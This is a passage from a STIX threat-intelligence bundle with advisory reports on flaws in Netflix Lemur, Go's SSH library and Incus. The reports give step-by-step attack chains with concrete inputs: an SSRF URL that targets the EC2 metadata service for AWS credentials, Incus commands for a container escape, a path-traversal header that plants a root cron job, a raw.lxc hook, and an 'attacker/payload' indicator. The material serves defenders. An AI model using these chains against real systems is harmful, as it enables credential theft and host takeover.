      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "indicator--67400db3-af52-574f-b95e-fa222ec07c3b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--12349dfb-9e3c-56a5-ad9d-6fa855373ad9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: victim-admin@netflix.example",
      "pattern": "[email-addr:value = 'victim-admin@netflix.example']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:43:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc714b13-8ba8-52a6-818f-def62063b3ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "indicator--12349dfb-9e3c-56a5-ad9d-6fa855373ad9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--30ea7f15-9537-5d53-ac06-faaeb1e65067",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://asciinema.org/a/CFYaoR2fxWEIdZDf",
      "pattern": "[url:value = 'https://asciinema.org/a/CFYaoR2fxWEIdZDf']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:43:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--527793c4-ed99-5ed3-910c-8c406f62d146",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "indicator--30ea7f15-9537-5d53-ac06-faaeb1e65067"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f9df24bb-0220-5997-a58b-09158cb49d67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Application Access Token",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1538",
          "url": "https://attack.mitre.org/techniques/T1538"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ef4d866b-b141-54bf-a7ce-1ac302be78c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--407d309b-66cc-5e47-8bd5-ff79ea6c6be5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--483fc224-a7c5-5e96-b17e-621a5f7b8df5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ea44e8c-49f1-5f7a-8c7d-d7306b404f91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2cd9c53f-628d-5661-a05a-be50af0d5cb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Lemur 1.9.0 Server-Side Request Forgery and IDOR Lead to AWS IAM Compromise",
      "description": "## Overview\n\nA critical vulnerability chain impacting Netflix's Lemur certificate management service, specifically version 1.9.0 and earlier releases, allows any SSO-authenticated user to achieve AWS IAM compromise and permanent PKI key access. The attack leverages three distinct weaknesses: automatic provisioning of new SSO identities as `active=True` without admin approval (affecting `lemur/lemur/auth/views.py:300-308`), an unauthenticated Server-Side Request Forgery (SSRF) in the ACME authority creation endpoint allowing `acme_url` to target the EC2 IMDS (`lemur/lemur/plugins/lemur_acme/acme_handlers.py:161-201`), and a creator-equality Insecure Direct Object Reference (IDOR) that grants the original certificate creator unconditional access to its private key, even after ownership transfer (`lemur/lemur/certificates/views.py:734`). This combination enables an attacker to exfiltrate AWS STS credentials of the Lemur worker role and maintain permanent access to any TLS private key they originally issued, circumventing standard remediation efforts.\n\n## Attack Chain\n\n1.  **SSO Auto-Provisioning (Initial Access)**: An attacker authenticates via corporate SSO, which Lemur automatically provisions as an active user (`active=True`, `auto_provisioned=true`) without administrative approval or role restrictions.\n2.  **ACME Authority Creation with SSRF (Credential Access)**: The attacker, now an authenticated Lemur user, creates a new ACME authority, providing a malicious `acme_url` pointing to `http://169.254.169.254/latest/meta-data/iam/security-credentials/lemur-acme-role`.\n3.  **IMDS Credential Exfiltration (Exfiltration)**: The Lemur worker process makes a server-side request to the IMDS endpoint as specified in `acme_url`, retrieves AWS STS credentials (AccessKeyId, SecretAccessKey, Token), and returns them in the API response to the attacker via the `ssrf_response_body` field.\n4.  **Issue Certificate**: The attacker uses their newly acquired STS credentials (or their existing Lemur session) to issue a new certificate via Lemur, ensuring they are the original `creator_id` of the certificate.\n5.  **Ownership Transfer (Defense Evasion)**: To obfuscate their activity, the attacker transfers ownership of the newly issued certificate to a legitimate victim administrator's email (`owner:\"victim-admin@netflix.example\"`).\n6.  **Persistent Private Key Access (Persistence)**: Despite the ownership transfer, the attacker, as the original `creator_id`, can still re-fetch the certificate's private key via the `/api/1/certificates/{id}/key` endpoint, due to the creator-equality IDOR vulnerability, granting them permanent access.\n\n## Impact\n\nSuccessful exploitation of this vulnerability chain leads to severe consequences. Attackers gain access to the AWS STS credentials of the Lemur worker role, potentially allowing them to compromise various AWS resources and services that the Lemur role has permissions to manage. Furthermore, the attacker achieves permanent access to any TLS private keys they issue through Lemur, regardless of subsequent ownership changes or auditing attempts. This undermines the integrity of the organization's Public Key Infrastructure (PKI), enabling decryption of sensitive communications, impersonation of services, or unauthorized signing. The persistent nature of the private key access means that even typical incident response actions like transferring certificate ownership will not revoke the attacker's access.\n\n## Recommendation\n\n*   **Patch Lemur immediately**: Upgrade `github.com/Netflix/lemur` to a version higher than 1.9.0 that contains fixes for these vulnerabilities. If a patch is not available, apply vendor-provided mitigations for CVE-918, CVE-639, and CVE-285.\n*   **Review and Harden SSO Integration**: Configure Lemur's SSO integration to require administrative approval for new user accounts or implement allowlists for email domains, as highlighted by the `SSO auto-provision` vulnerability.\n*   **Deploy Sigma Rule for SSRF**: Implement the `Detect Lemur ACME SSRF to IMDS` Sigma rule to detect attempts to configure ACME authorities with IMDS endpoints or other RFC1918 addresses.\n*   **Deploy Sigma Rule for Private Key Exfiltration**: Implement the `Detect Lemur Certificate Private Key Exfiltration` Sigma rule to identify suspicious retrieval of certificate private keys by original creators after ownership transfer.\n*   **Monitor Lemur API Logs**: Actively monitor API calls to `/api/1/authorities` for `acme_url` values pointing to internal IP addresses (e.g., `169.254.169.254`) or unexpected external hosts, and API calls to `/api/1/certificates/{id}/key` from users who are not the current `owner`.\n",
      "published": "2026-07-03T10:43:57Z",
      "labels": [
        "ssrf",
        "idor",
        "aws",
        "iam",
        "pki",
        "credential-access",
        "exfiltration",
        "webserver"
      ],
      "object_refs": [
        "indicator--ae965e64-dec6-5039-af48-dc85ad92dd56",
        "indicator--c95474da-e217-5dd8-8a4b-edf850f986ec",
        "indicator--67400db3-af52-574f-b95e-fa222ec07c3b",
        "indicator--12349dfb-9e3c-56a5-ad9d-6fa855373ad9",
        "indicator--30ea7f15-9537-5d53-ac06-faaeb1e65067",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v2wp-frmc-5q3v"
        },
        {
          "source_name": "reference",
          "url": "https://asciinema.org/a/CFYaoR2fxWEIdZDf"
        }
      ],
      "confidence": 95
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--80bc66cb-1335-54dc-be97-0fd9bbd118a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "golang.org/x/crypto/ssh FIDO/U2F Physical Presence Bypass (CVE-2026-39831)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-39831, has been identified in the `golang.org/x/crypto/ssh` package, specifically in versions prior to 0.52.0. This flaw affects the `Verify()` method for FIDO/U2F security key types, including `sk-ecdsa-sha2-nistp256@openssh.com` and `sk-ssh-ed25519@openssh.com`. The vulnerability stems from the method's failure to properly check the \"User Presence\" flag. This oversight allows signatures generated by a hardware security key to be accepted without requiring the user's physical touch, effectively bypassing a critical security mechanism designed to prevent unauthorized or unattended use of the key. For organizations relying on FIDO/U2F for SSH authentication using this Go package, this could lead to unauthorized access if an attacker gains control over a system with an available, un-touched hardware security key. Defenders should prioritize updating to version 0.52.0 or later to mitigate this risk, or reconfigure to explicitly require user presence.\n\n## Attack Chain\n\n1.  An attacker gains access to a client machine with a FIDO/U2F security key connected and available for use (e.g., via malware or physical access).\n2.  The attacker initiates an SSH connection to a vulnerable server, attempting to authenticate using the FIDO/U2F key.\n3.  The SSH server, running an application built with `golang.org/x/crypto/ssh` (version \u003c 0.52.0), sends an authentication challenge.\n4.  The attacker's controlled client generates an SSH signature using the FIDO/U2F key, but without the required user physical touch.\n5.  The vulnerable `Verify()` method within the server's `golang.org/x/crypto/ssh` library fails to validate the \"User Presence\" flag within the received signature.\n6.  The server accepts this unverified signature as legitimate, granting the attacker authenticated access to the system.\n\n## Impact\n\nThe immediate impact of this vulnerability is the potential for unauthorized SSH access if an attacker can leverage an already connected FIDO/U2F security key without the legitimate user's physical presence. This bypasses a fundamental security control of hardware security keys, which is designed to prevent remote or surreptitious authentication attempts. Organizations using `golang.org/x/crypto/ssh` for server-side SSH authentication are at risk of unauthorized access to their systems, potentially leading to data exfiltration, system compromise, or further network lateral movement. While no active exploitation is reported, the nature of the flaw could enable a determined attacker to gain privileged access to critical infrastructure.\n\n## Recommendation\n\n*   Patch CVE-2026-39831 by updating the `golang.org/x/crypto/ssh` package to version 0.52.0 or later on all affected systems.\n*   Review applications using `golang.org/x/crypto/ssh` to confirm correct implementation of `PublicKeyCallback` regarding the \"no-touch-required\" extension, as advised in GHSA-89gr-r52h-f8rx, to explicitly manage FIDO/U2F user presence requirements.\n",
      "published": "2026-07-03T10:42:03Z",
      "labels": [
        "ssh",
        "vulnerability",
        "golang",
        "fido",
        "u2f"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-89gr-r52h-f8rx"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Container Escape",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1611",
          "url": "https://attack.mitre.org/techniques/T1611"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9291804a-dae0-5756-8f07-6dc6e7ffe0ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--027d5992-cb2d-513c-9f43-603afa8e340d",
      "target_ref": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--027d5992-cb2d-513c-9f43-603afa8e340d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Incus Container Escape via Arbitrary File Read/Write (CVE-2026-48749)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-48749, has been identified in Incus, a container and VM management system developed by LXC. This flaw enables a malicious actor to achieve arbitrary file read and write capabilities on the host system with root privileges, potentially escalating to full command execution. The vulnerability arises from Incus's handling of specially crafted container images, specifically when a duplicate top-level `rootfs` symlink is present. While Incus initially validates `metadata.yaml` and a normal `rootfs/` entry, it subsequently processes a symlink like `rootfs -\u003e /`, allowing a container's root filesystem to be mapped directly to the host's root. This bypasses container isolation, granting the attacker unauthorized access to the host's underlying filesystem and sensitive files such as `/etc/shadow`, affecting Incus versions prior to 7.2.0.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Incus image package (`.tar` file) that initially contains a valid `metadata.yaml` and an empty `rootfs/` directory.\n2.  The attacker then manipulates the `.tar` archive by removing the legitimate `rootfs/` directory.\n3.  A symbolic link named `rootfs` pointing to `/` (the host's root directory) is injected into the archive at the top level.\n4.  The malicious image (`afrw-rootfs-symlink.tar`) is imported into a vulnerable Incus instance using `incus image import`.\n5.  A new container is initialized from this malicious image using `incus init afrw-rootfs-symlink afrw-rootfs-symlink`.\n6.  The attacker uses `incus file pull` commands, targeting paths like `/etc/shadow` from within the created container, to read arbitrary files from the host filesystem.\n7.  The attacker uses `incus file push` commands to write or create arbitrary files on the host filesystem.\n8.  Successful arbitrary file read/write with root privileges can lead to host compromise, including privilege escalation or arbitrary command execution.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-48749 leads to arbitrary file read and write on the host system with root privileges. This means an attacker can access any file on the host, including sensitive system configuration files (e.g., `/etc/shadow` for password hashes) or application data. Furthermore, the ability to write arbitrary files allows for planting malicious executables, modifying critical system configurations, or establishing persistence mechanisms. Ultimately, this can lead to full host compromise, enabling arbitrary command execution, data exfiltration, system defacement, or further lateral movement within the compromised environment. The vulnerability impacts organizations utilizing Incus for containerization and could lead to significant data breaches or operational disruption.\n\n## Recommendation\n\n*   Prioritize patching all Incus instances to version 7.2.0 or later immediately to remediate CVE-2026-48749.\n*   Review Incus image origins and implement strict controls to prevent the import of untrusted or malicious container images.\n*   Monitor Incus server logs for unusual image import attempts or unexpected file operations performed via `incus file` commands originating from newly provisioned containers.\n",
      "published": "2026-07-03T10:40:37Z",
      "labels": [
        "container-escape",
        "privilege-escalation",
        "vulnerability-exploitation",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-2q3f-q5pq-g8wv"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9bd18707-147d-5c0b-8b9d-2ef46a209d3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://attacker/payload",
      "pattern": "[url:value = 'http://attacker/payload']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:34:05Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3714912d-3bd9-57d8-bf9a-38f339e66831",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8177397b-1ea1-5891-a757-8658c090d7b9",
      "target_ref": "indicator--9bd18707-147d-5c0b-8b9d-2ef46a209d3b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed23a201-50bf-5856-abf6-e4db88696f2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8177397b-1ea1-5891-a757-8658c090d7b9",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81a920e0-2810-566b-8e51-54fe1f58bb4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8177397b-1ea1-5891-a757-8658c090d7b9",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b399c2a2-957b-5dae-b800-979fa176f449",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8177397b-1ea1-5891-a757-8658c090d7b9",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8177397b-1ea1-5891-a757-8658c090d7b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Incus Client Arbitrary File Write via Malicious Image Hash (CVE-2026-48769)",
      "description": "## Overview\n\nA critical arbitrary file write vulnerability, tracked as CVE-2026-48769, affects the Incus client daemon (`incusd`) versions prior to 7.2.0. This flaw stems from improper validation of the `Incus-Image-Hash` HTTP header when `incusd` imports an image from a remote URL. A malicious Incus image server can craft this header to include path traversal sequences (e.g., `../../../../etc/cron.d/`), tricking `incusd` into writing an arbitrary file to a sensitive location on the host system with root privileges. By leveraging this to create a cron job (e.g., `/etc/cron.d/incus-direct-image-url-rce`), an attacker can achieve arbitrary command execution as root, leading to full system compromise and privilege escalation. This vulnerability poses a significant risk to Incus environments where image imports from untrusted sources are permitted.\n\n## Attack Chain\n\n1.  An attacker sets up a malicious Incus image server controlled by them.\n2.  The victim's Incus server (`incusd` daemon) is instructed to import an image using a user-supplied URL pointing to the attacker-controlled server (e.g., via `incus image import \u003cmalicious_URL\u003e`).\n3.  `incusd` initiates a HEAD request to the attacker's server to retrieve image metadata.\n4.  The malicious server responds with a crafted `Incus-Image-Hash` HTTP header containing a path traversal sequence (e.g., `../../../../etc/cron.d/incus-direct-image-url-rce`) and an `Incus-Image-URL` header pointing to the malicious payload.\n5.  `incusd` processes these headers, and its `imageDownload()` function constructs a file path by combining `/var/lib/incus/images/` with the attacker-supplied hash. Due to the path traversal, this resolves to a sensitive system path, such as `/etc/cron.d/incus-direct-image-url-rce`.\n6.  `incusd` invokes `os.Create()` on this crafted path, creating the arbitrary file `/etc/cron.d/incus-direct-image-url-rce` with root privileges.\n7.  `incusd` then makes a GET request to the `Incus-Image-URL` provided by the attacker and writes the malicious content (e.g., a cron job command `* * * * * root /bin/sh -c \"id \u003e /tmp/incus-direct-image-url-rce\"`) into the newly created file.\n8.  The host system's cron daemon subsequently executes the newly installed cron job, resulting in arbitrary command execution as root, enabling the attacker to gain full control over the Incus server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-48769 allows an attacker to achieve an arbitrary file write on the Incus host system with root privileges. This directly leads to arbitrary command execution by writing malicious cron jobs or other configuration files, effectively compromising the entire server. This includes potential for data exfiltration, further lateral movement, or installation of persistent backdoors. Systems running Incus versions prior to 7.2.0 that import images from untrusted sources are at severe risk of compromise. While no specific victim counts are detailed, any organization utilizing vulnerable Incus deployments is susceptible.\n\n## Recommendation\n\n*   Patch CVE-2026-48769 immediately by upgrading Incus to version 7.2.0 or later on all affected Linux servers.\n*   Deploy the Sigma rule in this brief to your SIEM to detect suspicious file creations by the `incusd` process in sensitive system directories.\n*   Implement strict controls over which Incus image servers are trusted and limit the ability of non-administrative users to import images from arbitrary URLs.\n*   Enable comprehensive file system logging (e.g., auditd for Linux) to detect unexpected file creations or modifications in sensitive directories like `/etc/cron.d/`.\n",
      "published": "2026-07-03T10:34:05Z",
      "labels": [
        "arbitrary-file-write",
        "path-traversal",
        "rce",
        "incus",
        "linux",
        "cve"
      ],
      "object_refs": [
        "indicator--9bd18707-147d-5c0b-8b9d-2ef46a209d3b",
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f6m5-xw2g-xc4x"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2654aa6e-6851-5e12-96ed-af25386e9b43",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ea940a1-9df5-513c-a7bd-ce0d787e3a85",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36d454b3-629e-5253-883a-2c2507746152",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ea940a1-9df5-513c-a7bd-ce0d787e3a85",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7ea940a1-9df5-513c-a7bd-ce0d787e3a85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Incus Restricted Project Bypass Leading to Arbitrary Command Execution (CVE-2026-48751)",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-48751) has been identified in Incus, affecting all versions prior to 7.2.0. This flaw allows a malicious actor to achieve arbitrary command execution with root privileges on the Incus server. The vulnerability stems from instance snapshots ignoring the `restricted.containers.lowlevel=block` setting. Attackers can craft a malicious Incus instance locally, integrate a snapshot configured to abuse low-level hooks like `raw.lxc` or `raw.qemu`, and then transfer this instance to a restricted project. When the malicious snapshot is restored within the restricted environment, the embedded commands are executed on the host, bypassing intended security controls. This allows for complete compromise of the Incus host, enabling persistent access, data exfiltration, or further lateral movement within the network.\n\n## Attack Chain\n\n1.  **Initial Setup (Attacker)**: The attacker creates a local Incus instance (e.g., `images:debian/trixie`) in an unrestricted project on their own system.\n2.  **Malicious Hook Injection**: The attacker injects a malicious low-level hook into the local Incus instance's configuration, specifically using `raw.lxc` or `raw.qemu`. For example, `incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c \"/bin/id \u003e/lxc-hook-prestart\"'`.\n3.  **Snapshot Creation**: A snapshot of the now-malicious local instance is created (e.g., `incus snapshot create rce-raw-lxc snap0`). This snapshot captures the injected malicious hook.\n4.  **Hook Removal (Optional but Recommended)**: The attacker removes the `raw.lxc` configuration from the local instance to allow for transfer to the restricted project without immediate detection or conflict.\n5.  **Instance Transfer**: The malicious instance with its snapshot is moved from the attacker's local, unrestricted environment to a remote Incus server's restricted project (e.g., `incus move rce-raw-lxc rem: --mode push`).\n6.  **Snapshot Restoration**: The attacker restores the malicious snapshot within the restricted project on the remote Incus server (e.g., `incus snapshot restore rem:rce-raw-lxc snap0`). Despite `restricted.containers.lowlevel=block` being active on the remote project, the snapshot restoration process bypasses this control.\n7.  **Command Execution**: Upon starting the instance from the restored snapshot (e.g., `incus start rem:rce-raw-lxc`), the pre-start hook embedded in the snapshot executes the arbitrary command (e.g., `/bin/id`) on the Incus host with root privileges.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-48751 leads to a complete bypass of Incus project restrictions, specifically the `restricted.containers.lowlevel=block` setting designed to prevent such abuses. This directly results in arbitrary command execution on the underlying Incus server, granting an attacker root privileges. Such compromise allows for full control over the host system, potentially enabling further network infiltration, data exfiltration, service disruption, or the deployment of additional malicious payloads. While specific victim counts are not available, all Incus instances running vulnerable versions prior to 7.2.0 are at risk, particularly those hosting untrusted containers or users in restricted projects.\n\n## Recommendation\n\n*   Immediately patch Incus instances to version 7.2.0 or later to remediate CVE-2026-48751.\n*   Deploy the provided Sigma rule to detect attempts to configure low-level Incus hooks, which indicates potential exploitation of CVE-2026-48751.\n*   Enable comprehensive `process_creation` logging for Linux systems to capture `incus` command executions and the execution of arbitrary commands.\n",
      "published": "2026-07-03T10:38:26Z",
      "labels": [
        "container-security",
        "linux",
        "privilege-escalation",
        "rce",
        "incus"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-48q5-w887-33wv"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--daf015cb-2f3e-54af-b0b7-769373c8c00d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--194d60bf-4ccf-5911-b1f4-d5dbb021b02b",
